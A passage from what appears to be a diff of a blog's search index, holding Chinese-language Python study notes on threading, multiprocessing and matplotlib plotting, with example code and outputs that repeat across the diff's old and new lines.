    def job2():
    global A # A 是一个全局变量
    for i in range(10):
    A += 10
    print('job2', A)


    if __name__ == '__main__':
    A = 0
    t1 = threading.Thread(target=job1)
    t2 = threading.Thread(target=job2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    job1job2 11job2 21job2 31job2 41job2 51 job2 61job2 71job2 81job2 91job2 1011job1 102job1 103job1 104job1 105job1 106job1 107job1 108job1 109job1 110

    上了锁的情况

    只有 job1 运行完才会运行 job2

    import threading


    def job1():
    global A, lock # 定义锁
    lock.acquire() # 上锁
    for i in range(10):
    A += 1
    print('job1', A)
    lock.release() # 解锁


    def job2():
    global A, lock # A 是一个全局变量
    lock.acquire() # 上锁
    for i in range(10):
    A += 10
    print('job2', A)
    lock.release() # 解锁


    if __name__ == '__main__':
    lock = threading.Lock()
    A = 0
    t1 = threading.Thread(target=job1)
    t2 = threading.Thread(target=job2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    job1 1job1 2job1 3job1 4job1 5job1 6job1 7job1 8job1 9job1 10job2 20job2 30job2 40job2 50job2 60job2 70job2 80job2 90job2 100job2 110
    ]]>
    + 正文

    2 添加线程 add thread

    1
    import threading

    显示线程的状态

    1
    threading.active_count()  # 显示有多少个已经激活的线程
    6
    1
    threading.enumerate()  # 显示已经激活的现场具体情况
    [<_MainThread(MainThread, started 5844)>, <Thread(IOPub, started daemon 7116)>, <Heartbeat(Heartbeat, started daemon 9816)>, <ControlThread(Control, started daemon 4020)>, <HistorySavingThread(IPythonHistorySavingThread, started 4124)>, <ParentPollerWindows(Thread-4, started daemon 10940)>]
    1
    threading.current_thread()  # 显示正在运行的线程
    <_MainThread(MainThread, started 5844)>

    添加一个线程

    1
    2
    def thread_job():
    print("Thid is an added Thread, number is %s" % threading.current_thread())
    1
    2
    3
    4
    def main():
    added_thread = threading.Thread(target=thread_job) # 添加一个线程: 目标 thread_job
    added_thread.start() # 运行这个线程

    1
    2
    if __name__ == "__main__":
    main()
    Thid is an added Thread, number is <Thread(Thread-8, started 7464)>

    3 join 功能

    1
    2
    import threading
    import time
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    def thread_job():
    print("T1start\n")
    for i in range(10):
    time.sleep(0.1) # 每步暂停 0.1 秒
    print("T1 finish\n")

    def T2_job():
    print('T2start\n')
    print('T2 finish')


    def main():
    added_thread = threading.Thread(target=thread_job, name='T1')
    thread2 = threading.Thread(target=T2_job, name='T2')

    added_thread.start()
    thread2.start()

    added_thread.join() # 加入到主线程
    thread2.join()

    print('all done\n')

    if __name__ == "__main__":
    main()
    T1startT2startT2 finishT1 finishall done

    ​ 当加入到主线程后,主线程中所有线程执行完毕后才会打印’all done\n’

    4 Quene 功能

    处理多线程中 target 函数没有返回值的情况

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    import threading
    import time
    from queue import Queue


    def job(l, q):
    for i in range(len(l)):
    l[i] **= 2
    q.put(l) # 将计算后的列表放到 q 中


    def multithreading():
    q = Queue()
    threads = []
    data = [[1, 2, 3], [3, 4, 5], [4, 4, 4], [5, 5, 5]]
    for i in range(4): # 创建 4 个线程
    t = threading.Thread(target=job, args=(data[i], q)) # args 给 target 函数传递参数
    t.start()
    threads.append(t)
    for thread in threads:
    thread.join()
    results = []
    for _ in range(4):
    results.append(q.get()) # 从队列中拿出数据, 加入到 results 列表中
    print(results)


    if __name__ == '__main__':
    multithreading()
    [[1, 4, 9], [9, 16, 25], [16, 16, 16], [25, 25, 25]]

    5 不一定有效率 GIL

    • 在处理较简单的问题时, 由于切换线程需要耗费时间(GIL), 多线程不一定比单线程用时更短(每个时刻只能有一个线程在 CPU 工作)
    • 为什么多线程有时候会比单线程耗时更短? 因为有些时候会边运算边读写数据. 解决方法: 多核运算
    • 分别用常规方法和多线程方法计算 0-99999 求和的四倍
      Python GIL 全局解释器锁详解(深度剖析)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    import threading
    from queue import Queue
    import copy
    import time


    def job(l, q):
    res = sum(l)
    q.put(res)


    def multithreading(l): # 多线程方法
    q = Queue()
    threads = []
    for i in range(4):
    t = threading.Thread(target=job, args=(copy.copy(l), q), name='T%i' % i)
    t.start()
    threads.append(t)
    [t.join() for t in threads]
    total = 0
    for _ in range(4):
    total += q.get()
    print(total)


    def normal(l): # 常规方法
    total = sum(l) # 对序列求和
    print(total)


    if __name__ == '__main__':
    l = list(range(1000_000))

    s_t = time.time()
    normal(l * 4)
    print('normal:', time.time() - s_t)

    s_t = time.time()
    multithreading(l)
    print('multithreading:', time.time() - s_t)
    1999998000000normal: 0.16908121109008791999998000000multithreading: 0.24041318893432617

    6 锁 lock

    一般只有在共享内存时才会用得到, 防止不同次运行程序时出现不同的情况

    未添加锁的情况

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import threading


    def job1():
    global A # A 是一个全局变量
    for i in range(10):
    A += 1
    print('job1', A)


    def job2():
    global A # A 是一个全局变量
    for i in range(10):
    A += 10
    print('job2', A)


    if __name__ == '__main__':
    A = 0
    t1 = threading.Thread(target=job1)
    t2 = threading.Thread(target=job2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    job1job2 11job2 21job2 31job2 41job2 51 job2 61job2 71job2 81job2 91job2 1011job1 102job1 103job1 104job1 105job1 106job1 107job1 108job1 109job1 110

    上了锁的情况

    只有 job1 运行完才会运行 job2

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    import threading


    def job1():
    global A, lock # 定义锁
    lock.acquire() # 上锁
    for i in range(10):
    A += 1
    print('job1', A)
    lock.release() # 解锁


    def job2():
    global A, lock # A 是一个全局变量
    lock.acquire() # 上锁
    for i in range(10):
    A += 10
    print('job2', A)
    lock.release() # 解锁


    if __name__ == '__main__':
    lock = threading.Lock()
    A = 0
    t1 = threading.Thread(target=job1)
    t2 = threading.Thread(target=job2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    job1 1job1 2job1 3job1 4job1 5job1 6job1 7job1 8job1 9job1 10job2 20job2 30job2 40job2 50job2 60job2 70job2 80job2 90job2 100job2 110
    ]]>
    @@ -10212,7 +10212,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88multiprocessing%EF%BC%89/ - 正文

    2 创建进程

    jupyter 只能跟踪主进程,没法跟踪子进程。

    import multiprocessing as mp
    import threading as td

    def job(a, d):
    print('aaaa')


    if __name__ == '__main__':
    p1 = mp.Process(target=job, args=(1, 2))
    p1.start()
    p1.join()

    3 queue 进程输出

    import multiprocessing as mp

    def job(q):
    res = 0
    for i in range(1000):
    res += i + i ** 2 + i ** 3
    q.put(res)


    if __name__ == '__main__':
    q = mp.Queue()
    p1 = mp.Process(target=job, args=(q,))
    p2 = mp.Process(target=job, args=(q,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    res1 = q.get()
    res2 = q.get()
    print(res1 + res2)
    499667166000

    4 效率对比 multiprocessing, multithreading

    使用常规方法, 多核运算, 多线程运算:

    import multiprocessing as mp
    import threading as td
    import time


    def job(q):
    res = 0
    for i in range(10_000_000):
    res += i + i ** 2 + i ** 3
    q.put(res)


    def multicore(): # 多核运算(2)
    q = mp.Queue()
    p1 = mp.Process(target=job, args=(q,))
    p2 = mp.Process(target=job, args=(q,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    res1 = q.get()
    res2 = q.get()
    return res1 + res2


    def multithread(): # 多线程(2)
    q = mp.Queue()
    t1 = td.Thread(target=job, args=(q,))
    t2 = td.Thread(target=job, args=(q,))
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    res1 = q.get()
    res2 = q.get()
    return res1 + res2


    def normal(): # 常规方式
    res = 0
    for _ in range(2):
    for i in range(10_000_000):
    res += i + i ** 2 + i ** 3
    return res


    if __name__ == '__main__':
    st = time.time()

    print(normal())
    print('normal time: ', time.time() - st)

    st = time.time()
    print(multicore())
    print('multicore time: ', time.time() - st)

    st = time.time()
    print(multithread())
    print('multithread time: ', time.time() - st)

    4999999666666716666660000000
    normal time: 12.397605657577515
    4999999666666716666660000000
    multicore time: 6.265762090682983
    4999999666666716666660000000
    multithread time: 18.33289623260498

    用时: 多线程 > 常规 > 多核

    5 进程池 pool

    把要运行的东西放到一个 pool 中, python 会帮你解决怎么分配
    在 pool 中, job 函数可以拥有返回值

    import multiprocessing as mp


    def job(x):
    return x * x


    def multicore():
    pool = mp.Pool(processes=3) # 至多用 3 个核, 默认用全部的核
    res = pool.map(job, range(10)) # 多核运算 0 - 9 的平方, map()可以放入很多参数, 自动分配给定义好的线程
    print(res)

    res = pool.apply_async(job, (2,)) # 只能有一个参数, 返回值会存到 res 中
    print(res.get()) # 从 res 中拿出结果

    multi_res = [pool.apply_async(job, (i, )) for i in range(10)] # 使用迭代器达到 map()的效果
    print([res.get() for res in multi_res])


    if __name__ == '__main__':
    multicore()

    [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
    4
    [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]

    6 共享内存(Cache) shared memory

    在多线程中, 可以使用 global(全局变量)共享内存, 但这在多进程中行不通
    我们只能用共享内存让不同核的 CPU 进行数据间的交流

    shared memory 支持的数据类型

    import multiprocessing as mp

    value = mp.Value('i', 1) # 先传入类型, 再传入值
    array = mp.Array('i', [1, 3, 4]) # 这个数组只能是一维的, 否则会报错

    7 lock 锁

    未加锁:

    import multiprocessing as mp
    import time


    def job(v, num, name):
    for _ in range(10):
    time.sleep(0.1)
    v.value += num
    print(name + ': ' + str(v.value))


    def multicore():
    v = mp.Value('i', 0) # 定义一个共享内存
    p1 = mp.Process(target=job, args=(v, 1, 'p1'))
    p2 = mp.Process(target=job, args=(v, 3, 'p2'))
    p1.start()
    p2.start()
    p1.join()
    p2.join()


    if __name__ == '__main__':
    multicore()

    p1: 1
    p2: 4
    p1: 5
    p2: 8
    p1: 9
    p2: 12
    p1: 13
    p2: 16
    p1: 17
    p2: 20
    p1: 21
    p2: 24
    p1: 25
    p2: 28
    p1: 29
    p2: 32
    p1: 33
    p2: 36
    p1: 37
    p2: 40

    加锁:

    import multiprocessing as mp
    import time


    def job(v, num, name, l):
    l.acquire() # 上锁
    for _ in range(10):
    time.sleep(0.1)
    v.value += num
    print(name + ': ' + str(v.value))
    l.release() # 解锁


    def multicore():
    l = mp.Lock()
    v = mp.Value('i', 0) # 定义一个共享内存
    p1 = mp.Process(target=job, args=(v, 1, 'p1', l))
    p2 = mp.Process(target=job, args=(v, 3, 'p2', l))
    p1.start()
    p2.start()
    p1.join()
    p2.join()


    if __name__ == '__main__':
    multicore()

    p1: 1
    p1: 2
    p1: 3
    p1: 4
    p1: 5
    p1: 6
    p1: 7
    p1: 8
    p1: 9
    p1: 10
    p2: 13
    p2: 16
    p2: 19
    p2: 22
    p2: 25
    p2: 28
    p2: 31
    p2: 34
    p2: 37
    p2: 40
    ]]>
    + 正文

    2 创建进程

    jupyter 只能跟踪主进程,没法跟踪子进程。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import multiprocessing as mp
    import threading as td

    def job(a, d):
    print('aaaa')


    if __name__ == '__main__':
    p1 = mp.Process(target=job, args=(1, 2))
    p1.start()
    p1.join()

    3 queue 进程输出

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    import multiprocessing as mp

    def job(q):
    res = 0
    for i in range(1000):
    res += i + i ** 2 + i ** 3
    q.put(res)


    if __name__ == '__main__':
    q = mp.Queue()
    p1 = mp.Process(target=job, args=(q,))
    p2 = mp.Process(target=job, args=(q,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    res1 = q.get()
    res2 = q.get()
    print(res1 + res2)
    1
    499667166000

    4 效率对比 multiprocessing, multithreading

    使用常规方法, 多核运算, 多线程运算:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    import multiprocessing as mp
    import threading as td
    import time


    def job(q):
    res = 0
    for i in range(10_000_000):
    res += i + i ** 2 + i ** 3
    q.put(res)


    def multicore(): # 多核运算(2)
    q = mp.Queue()
    p1 = mp.Process(target=job, args=(q,))
    p2 = mp.Process(target=job, args=(q,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    res1 = q.get()
    res2 = q.get()
    return res1 + res2


    def multithread(): # 多线程(2)
    q = mp.Queue()
    t1 = td.Thread(target=job, args=(q,))
    t2 = td.Thread(target=job, args=(q,))
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    res1 = q.get()
    res2 = q.get()
    return res1 + res2


    def normal(): # 常规方式
    res = 0
    for _ in range(2):
    for i in range(10_000_000):
    res += i + i ** 2 + i ** 3
    return res


    if __name__ == '__main__':
    st = time.time()

    print(normal())
    print('normal time: ', time.time() - st)

    st = time.time()
    print(multicore())
    print('multicore time: ', time.time() - st)

    st = time.time()
    print(multithread())
    print('multithread time: ', time.time() - st)

    4999999666666716666660000000
    normal time: 12.397605657577515
    4999999666666716666660000000
    multicore time: 6.265762090682983
    4999999666666716666660000000
    multithread time: 18.33289623260498

    用时: 多线程 > 常规 > 多核

    5 进程池 pool

    把要运行的东西放到一个 pool 中, python 会帮你解决怎么分配
    在 pool 中, job 函数可以拥有返回值

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    import multiprocessing as mp


    def job(x):
    return x * x


    def multicore():
    pool = mp.Pool(processes=3) # 至多用 3 个核, 默认用全部的核
    res = pool.map(job, range(10)) # 多核运算 0 - 9 的平方, map()可以放入很多参数, 自动分配给定义好的线程
    print(res)

    res = pool.apply_async(job, (2,)) # 只能有一个参数, 返回值会存到 res 中
    print(res.get()) # 从 res 中拿出结果

    multi_res = [pool.apply_async(job, (i, )) for i in range(10)] # 使用迭代器达到 map()的效果
    print([res.get() for res in multi_res])


    if __name__ == '__main__':
    multicore()

    [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
    4
    [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]

    6 共享内存(Cache) shared memory

    在多线程中, 可以使用 global(全局变量)共享内存, 但这在多进程中行不通
    我们只能用共享内存让不同核的 CPU 进行数据间的交流

    shared memory 支持的数据类型

    1
    2
    3
    4
    import multiprocessing as mp

    value = mp.Value('i', 1) # 先传入类型, 再传入值
    array = mp.Array('i', [1, 3, 4]) # 这个数组只能是一维的, 否则会报错

    7 lock 锁

    未加锁:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    import multiprocessing as mp
    import time


    def job(v, num, name):
    for _ in range(10):
    time.sleep(0.1)
    v.value += num
    print(name + ': ' + str(v.value))


    def multicore():
    v = mp.Value('i', 0) # 定义一个共享内存
    p1 = mp.Process(target=job, args=(v, 1, 'p1'))
    p2 = mp.Process(target=job, args=(v, 3, 'p2'))
    p1.start()
    p2.start()
    p1.join()
    p2.join()


    if __name__ == '__main__':
    multicore()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    p1: 1
    p2: 4
    p1: 5
    p2: 8
    p1: 9
    p2: 12
    p1: 13
    p2: 16
    p1: 17
    p2: 20
    p1: 21
    p2: 24
    p1: 25
    p2: 28
    p1: 29
    p2: 32
    p1: 33
    p2: 36
    p1: 37
    p2: 40

    加锁:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import multiprocessing as mp
    import time


    def job(v, num, name, l):
    l.acquire() # 上锁
    for _ in range(10):
    time.sleep(0.1)
    v.value += num
    print(name + ': ' + str(v.value))
    l.release() # 解锁


    def multicore():
    l = mp.Lock()
    v = mp.Value('i', 0) # 定义一个共享内存
    p1 = mp.Process(target=job, args=(v, 1, 'p1', l))
    p2 = mp.Process(target=job, args=(v, 3, 'p2', l))
    p1.start()
    p2.start()
    p1.join()
    p2.join()


    if __name__ == '__main__':
    multicore()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    p1: 1
    p1: 2
    p1: 3
    p1: 4
    p1: 5
    p1: 6
    p1: 7
    p1: 8
    p1: 9
    p1: 10
    p2: 13
    p2: 16
    p2: 19
    p2: 22
    p2: 25
    p2: 28
    p2: 31
    p2: 34
    p2: 37
    p2: 40
    ]]>
    @@ -10239,7 +10239,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88matplotlib%EF%BC%89/ - 正文

    2.1 基本用法

    import matplotlib.pyplot as plt
    import numpy as np

    二维函数图像

    x = np.linspace(-1, 1, 50)
    y = 2 * x + 1
    plt.plot(x, y) # 录入数据
    plt.show() # 显示图片

    png

    2.2 figure 图像

    import matplotlib.pyplot as plt
    import numpy as np

    显示多个图像

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure()
    plt.plot(x, y1)

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

    plt.show()

    png

    png

    2.3 设置坐标轴 1

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

    plt.xlim((-1, 2)) # 设置取值范围
    plt.ylim((-2, 3))
    plt.xlabel('I am X') # 设置坐标轴名称
    plt.ylabel('I am Y')

    new_ticks = np.linspace(-1, 2, 5) # 设置单位范围
    print(new_ticks)
    plt.xticks(new_ticks)

    plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$']) # 设置单位标签

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

    2.4 设置坐标轴 2

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

    plt.xlim((-1, 2)) # 设置取值范围
    plt.ylim((-2, 3))
    plt.xlabel('I am X') # 设置坐标轴名称
    plt.ylabel('I am Y')

    new_ticks = np.linspace(-1, 2, 5) # 设置单位范围
    print(new_ticks)
    plt.xticks(new_ticks)

    plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$']) # 设置单位标签

    ax = plt.gca()
    ax.spines['right'].set_color('none') # 消失右端坐标轴
    ax.spines['top'].set_color('none') # 消失顶端坐标轴
    ax.xaxis.set_ticks_position('bottom') # 关联坐标轴
    ax.yaxis.set_ticks_position('left')
    ax.spines['bottom'].set_position(('data', 0)) # 修改原点位置
    ax.spines['left'].set_position(('data', 0))

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

    2.5Legend 图例

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.xlim((-1, 2)) # 设置取值范围
    plt.ylim((-2, 3))
    plt.xlabel('I am X') # 设置坐标轴名称
    plt.ylabel('I am Y')

    new_ticks = np.linspace(-1, 2, 5) # 设置单位范围
    print(new_ticks)
    plt.xticks(new_ticks)

    plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$']) # 设置单位标签

    l1, = plt.plot(x, y2, label='up') # 设置图例
    l2, = plt.plot(x, y1, color='red', linewidth=1.0, linestyle='--', label='down')
    plt.legend(handles=[l1, l2,], labels=['aaa', 'bbb'] , loc='best') # 显示图例

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

    2.6 Annotation 标注

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y = 2 * x + 1

    plt.figure(num=1, figsize=(8, 5),)
    plt.plot(x, y,)

    ax = plt.gca()
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))

    x0 = 1
    y0 = 2 * x0 + 1
    plt.scatter(x0, y0, s=50, color='b') # 显示点(1, 3)
    plt.plot([x0, x0], [y0, 0], 'k--', lw=2.5) # 绘制黑色虚线

    plt.annotate(r'$2x+1=%s$' % y0, xy=(x0, y0), xycoords='data', xytext=(+30, -30),
    textcoords='offset points', fontsize=16, arrowprops=dict(arrowstyle='->',
    connectionstyle='arc3, rad=.2')) # 输入注释

    plt.text(-3.7, 3, r'$This\ is\ the\ some\ text.\ \mu\ \sigma_i\ \alpha_t$',
    fontdict={'size': 16, 'color': 'r'})

    plt.show()

    png

    2.7 tick 能见度

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y = 0.1 * x

    plt.figure()
    plt.plot(x, y, lw=10)
    plt.ylim(-2, 2)

    ax = plt.gca()
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))

    for label in ax.get_xticklabels() + ax.get_yticklabels():
    label.set_fontsize(12)
    label.set_bbox(dict(facecolor='yellow', edgecolor='None', alpha=0.7))

    plt.show()

    png

    3.1 Scatter 散点图

    import matplotlib.pyplot as plt
    import numpy as np

    n = 1024
    X = np.random.normal(0, 1, n)
    Y = np.random.normal(0, 1, n)
    T = np.arctan2(Y, X) # 只是为了好看
    plt.scatter(X, Y, s=75, c=T, alpha=0.5)
    plt.xlim((-1.5, 1.5))
    plt.ylim((-1.5, 1.5))
    plt.xticks(()) # 隐藏所有的 xticks
    plt.yticks(())

    plt.show()

    png

    3.2 Bar 柱状图

    import matplotlib.pyplot as plt
    import numpy as np

    n = 12
    X = np.arange(n)
    Y1 = (1 - X / float(n) * np.random.uniform(0.5, 1.0, n))
    Y2 = (1 - X / float(n) * np.random.uniform(0.5, 1.0, n))

    plt.bar(X, +Y1, facecolor="#9999ff", edgecolor="white") # 向上的柱状图
    plt.bar(X, -Y2, facecolor="#ff9999", edgecolor="white") # 向下的柱状图

    for x, y in zip(X, Y1): # zip 把 X,Y1 分别传给 x, y
    # ha: horizontal alignment
    plt.text(x, y + 0.05, '%.2f' % y, ha='center', va="bottom")
    for x, y in zip(X, Y2): # zip 把 X,Y1 分别传给 x, y
    # ha: horizontal alignment
    plt.text(x, -y - 0.2, '%.2f' % -y, ha='center', va="bottom")

    plt.xlim(-0.5, n)
    plt.xticks(())
    plt.ylim(-1.25, 1.25)
    plt.yticks(())

    plt.show()

    png

    3.3 Contours 等高线图

    import matplotlib.pyplot as plt
    import numpy as np


    def f(x, y):
    return (1 - x / 2 + x ** 5 + y ** 3) * np.exp(-x ** 2 - y ** 2)


    n = 256
    x = np.linspace(-3, 3, n)
    y = np.linspace(-3, 3, n)
    X, Y = np.meshgrid(x, y) # 把 x 和 y 绑定成网格的输入值

    plt.contourf(X, Y, f(X, Y), 8, alpha=0.75, cmap=plt.cm.hot)
    C = plt.contour(X, Y, f(X, Y), 8, colors='black')

    plt.clabel(C, inline=True, fontsize=10)

    plt.xticks(())
    plt.yticks(())
    plt.show()

    png

    3.4 Image 图片

    import matplotlib.pyplot as plt
    import numpy as np

    a = np.array(np.random.random(9)).reshape(3, 3) # 图片
    a.sort()
    plt.imshow(a, interpolation="none", cmap='bone', origin='lower')
    plt.colorbar(shrink=0.9)

    plt.xticks(())
    plt.yticks(())
    plt.show()

    png

    3.5 3D 数据

    import numpy as np
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    fig = plt.figure() # 新建一个 figure 窗口
    ax = Axes3D(fig, auto_add_to_figure=False) # 添加三维坐标轴
    fig.add_axes(ax)

    # 输入数据
    X = np.arange(-4, 4, 0.25)
    Y = np.arange(-4, 4, 0.25)
    X, Y = np.meshgrid(X, Y)
    R = np.sqrt(X ** 2 + Y ** 2)
    Z = np.sin(R)

    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
    ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap='rainbow')
    ax.set_zlim(-2, 2)

    plt.show()

    png

    4.1 Subplot 多合一显示

    import matplotlib.pyplot as plt

    plt.figure()

    plt.subplot(2, 1, 1) # 将整个 figure 分成 2 行 1 列,第一张图
    plt.plot([0, 1], [0, 1])

    plt.subplot(2, 3, 4)
    plt.plot([0, 1], [0, 2])

    plt.subplot(235)
    plt.plot([0, 1], [0, 3])

    plt.subplot(236)
    plt.plot([0, 1], [0, 4])

    plt.show()

    png

    4.2 Subplot 分隔显示

    import matplotlib.pyplot as plt
    import matplotlib.gridspec as gridspec
    # method 1: subplot2grid
    plt.figure()

    ax1 = plt.subplot2grid((3, 3), (0, 0), colspan=3, rowspan=1)
    ax1.plot([1, 2], [1, 2])
    ax1.set_title("ax1_title")

    ax2 = plt.subplot2grid((3, 3), (1, 0), colspan=2, rowspan=1)

    ax3 = plt.subplot2grid((3, 3), (1, 2), colspan=1, rowspan=2)

    ax4 = plt.subplot2grid((3, 3), (2, 0), colspan=1, rowspan=1)

    ax5 = plt.subplot2grid((3, 3), (2, 1), colspan=1, rowspan=1)

    plt.tight_layout()
    plt.show()


    png

    # method 2: gridspec
    plt.figure()
    gs = gridspec.GridSpec(3, 3)
    ax1 = plt.subplot(gs[0, :])
    ax2 = plt.subplot(gs[1, :2])
    ax3 = plt.subplot(gs[1:, 2])
    ax4 = plt.subplot(gs[-1, 0])
    ax5 = plt.subplot(gs[-1, -2])

    plt.tight_layout()
    plt.show()


    png

    # method 3: easy to define structure
    f, ((ax11, ax12), (ax21, ax22)) = plt.subplots(2, 2, sharex=True, sharey=True)
    ax11.scatter([1, 2], [1, 2])

    plt.tight_layout()
    plt.show()

    png

    4.3 图中图

    import matplotlib.pyplot as plt

    fig = plt.figure()
    x = [1, 2, 3, 4, 5, 6, 7]
    y = [1, 3, 4, 2, 5, 8, 6]

    left, bottom, width, height = 0.1, 0.1, 0.8, 0.8
    ax1 = fig.add_axes([left, bottom, width, height])
    ax1.plot(x, y, 'r')
    ax1.set_xlabel('x')
    ax1.set_ylabel('y')
    ax1.set_title('title')

    left, bottom, width, height = 0.2, 0.6, 0.25, 0.25
    ax2 = fig.add_axes([left, bottom, width, height])
    ax2.plot(y, x, 'b')
    ax2.set_xlabel('x')
    ax2.set_ylabel('y')
    ax2.set_title('title inside 1')

    plt.axes([0.6, 0.2, 0.25, 0.25])
    plt.plot(y[::-1], x, 'g')
    plt.xlabel('x')
    plt.ylabel('y')
    plt.title('title inside 2')


    plt.show()

    png

    4.4 次坐标轴

    import matplotlib.pyplot as plt
    import numpy as np
    x = np.arange(0, 10, 0.1)
    y1 = 0.05 * x ** 2
    y2 = -1 * y1

    fig, ax1 = plt.subplots()
    ax2 = ax1.twinx() # 把 ax1 的坐标轴镜像翻转
    ax1.plot(x, y1, 'g-')
    ax2.plot(x, y2, 'b--')
    ax1.set_xlabel('X data')
    ax1.set_ylabel('Y1', color='g')
    ax2.set_ylabel('Y2', color='b')

    plt.show()

    png

    5.1 Animation 动画

    import numpy as np
    from matplotlib import pyplot as plt
    from matplotlib import animation
    fig, ax = plt.subplots()

    x = np.arange(0, 2 * np.pi, 0.01)
    line, = ax.plot(x, np.sin(x))

    def animate(i):
    line.set_ydata(np.sin((x + i / 10)))
    return line,

    def init():
    line.set_ydata(np.sin(x))
    return line,

    ani = animation.FuncAnimation(fig=fig, func=animate, frames=100, init_func=init, interval=20, blit=True)

    plt.show()

    png

    ]]>
    + 正文

    2.1 基本用法

    1
    2
    import matplotlib.pyplot as plt
    import numpy as np

    二维函数图像

    1
    2
    3
    4
    x = np.linspace(-1, 1, 50)
    y = 2 * x + 1
    plt.plot(x, y) # 录入数据
    plt.show() # 显示图片

    png

    2.2 figure 图像

    1
    2
    import matplotlib.pyplot as plt
    import numpy as np

    显示多个图像

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure()
    plt.plot(x, y1)

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

    plt.show()

    png

